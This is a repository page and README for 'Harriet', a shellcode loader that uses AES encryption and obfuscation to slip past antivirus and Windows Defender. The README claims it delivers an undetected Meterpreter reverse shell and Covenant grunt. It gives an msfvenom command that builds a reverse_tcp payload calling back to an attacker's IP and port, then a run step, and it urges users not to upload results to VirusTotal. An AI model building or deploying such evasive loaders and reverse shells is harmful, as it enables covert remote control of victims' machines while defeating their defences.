assume-breach
01a931074f
Update setup.sh
|
3 tahun lalu | |
|---|---|---|
| .. | ||
| Harriet | 3 tahun lalu | |
| Harriet.sh | 3 tahun lalu | |
| README.md | 3 tahun lalu | |
| setup.sh | 3 tahun lalu | |
README.md
Meet Harriet!
Harriet was inspired by the Charlotte C++ shellcode loader. This tool uses AES encryption and function/variable obfuscation to get around AV and Windows Defender.
At the time of writing, this is only detected by 1 vendor per AntiScan.me and will give you an undetected Meterpreter reverse shell. As we all know, Meterpreter is heavily signatured so you will have to play with the features (getsystem, hashdump,ect) to see what gets caught and what doesn't. I would recommend using my Covenant Randomizer script with this to get an initial access executable and then session pass to MSF, Sliver or another C2 for better OPSEC.
The executables got past Windows Defender on both fully patched Windows 10/11 machines with the meterpreter reverse tcp payload.
The executable also returned a Covenant grunt without detection.
There is no fancy process injection, it's just a straight AES encrypted executable. I will be working to implement other templates into the script in the future (XOR string encryption, Process Injection, ect).
The majority of this script was taken from the Sektor 7 Malware Development course. All credit goes to reenz0h and @Sektor7net. I wrote this mainly as a way to get a quick undetected executable for testing and to not have to switch over to a Windows VM every five seconds for compiling.
Usage:
Create Your Payload
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=IP lport=PORT -f raw > msfr.bin
Run the Script
**bash Harriet.sh **
Fill In The Values As Prompted
Enjoy and DON'T UPLOAD TO Virus Total!!!!!